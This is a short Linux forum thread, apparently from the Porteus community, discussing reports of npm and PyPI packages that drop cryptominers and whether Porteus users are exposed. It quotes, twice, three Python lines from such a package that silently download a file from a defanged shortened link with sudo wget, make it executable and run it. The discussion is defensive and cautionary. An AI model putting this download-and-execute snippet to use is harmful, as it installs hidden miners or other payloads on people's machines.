Is PyPI something to lookout for in Porteus?
Posted: 20 Aug 2022, 01:52
Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers article and wondered...
Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
OK...thanks!ncmprhnsbl wrote: ↑20 Aug 2022, 02:29the fact that they(bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:would(should) prompt for a password, which should alert the user to something being off..Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1") os.system("chmod +x .cmc >/dev/null 2>&1") os.system("./.cmc >/dev/null 2>&1")
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl' which is systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..